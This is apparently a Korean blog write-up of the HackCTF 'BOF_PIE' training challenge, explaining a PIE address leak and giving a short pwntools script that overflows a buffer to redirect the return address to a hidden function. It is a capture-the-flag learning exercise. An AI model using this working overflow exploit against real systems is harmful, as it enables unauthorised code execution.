
[hackctf] BOF_PIE
sangjun
·2021. 4. 18. 18:58
반응형
문제 소스
보호기법
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : ENABLED
RELRO : Partial
문제 분석 및 페이로드
welcome함수가 맵핑되는 주소가 leak되니 welcome함수로부터 "종현"함수까지의 거리를 알아내고
ret을 변조시키면 된다.
from pwn import *
dns,port="ctf.j0n9hyun.xyz", 3008
p=remote(dns,port)
#
#p=process("./bof_pie")
e=ELF("./bof_pie")
p.recvuntil("is ")
addr=p.recvline()[:-1]
print addr
pay="A"*22
pay+=p32(int(addr,16)-0x79)
p.sendline(pay)
#pause()
print p.recvline()
print p.recvline()
참고문헌 및 힘들었던 부분
1. 바이너리 분석 제대로 하기
--> 종현 함수의 주소가 릭 되는 것이 아니라 welcome함수의 주소가 릭되는 거였다ㅠㅠㅠ
반응형
'War Games > hack-ctf' 카테고리의 다른 글
[hackctf] RTL_World (0) | 2021.04.18 |
---|---|
[hackctf] Yes or no (0) | 2021.04.18 |
[hackctf] offset (0) | 2021.04.18 |
[hackctf] Simple_Overflow_ver_2 (0) | 2021.04.18 |
[hackctf] x64 Simple_size_BOF (0) | 2021.04.18 |
0개의 댓글